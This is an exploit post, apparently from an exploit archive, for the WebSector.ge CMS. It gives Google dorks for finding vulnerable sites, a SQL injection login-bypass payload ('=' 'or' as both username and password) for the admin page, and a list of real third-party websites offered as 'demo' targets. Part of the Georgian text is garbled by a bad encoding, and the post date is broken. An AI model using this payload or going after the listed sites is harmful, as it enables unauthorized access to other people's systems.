WebSector.ge CMS SQL injection & Admin Page Bypass
Posted on 30 November -0001
<HTML><HEAD><TITLE>WebSector.ge CMS SQL injection & Admin Page Bypass</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: SQL injection & Admin Page Bypass |[+] |[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR |[+] |[+] Vendor Homepage: http://websector.ge/ |[+] |[+] Google Dork:intext:"websector.ge" inurl:php?id= |[+] Google Dork:სáƒáƒ˜áƒ¢áƒ˜ დáƒáƒ›áƒ–áƒáƒ“ებულირWebSector.ge-ის მიერ|[+] |[+] Tested on: Windows 7 |[+] |[+] Date: 06/12/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Username: '=' 'or' |[+] Password: '=' 'or' |[+] |[+] Admin Url :- |[+] |[+] http://Site.ge/admin/ |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+]http://www.turugeorgia.com/index.php?page=tour_single&id=34 |[+]http://ertobaplus.ge/index.php?page=product&catid=35 |[+]http://orbita.ge/index.php?page=pages&id=6 |[+]http://www.vitamin.ge/index.php?page=projects_single&id=95 |[+]http://www.hauck-georgien.com/index.php?page=products&cat=4 |--------------------------------------------------------------| |[+] Thanks: CXSECURITY.COM Team's Members |[+] AzÉ™rbaycan Güclü DövlÉ™tdir vÉ™ Onun Güclü Ordusu Var! |[+] Url : http://pagebin.com/G2V7JVOW |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| </BODY></HTML>
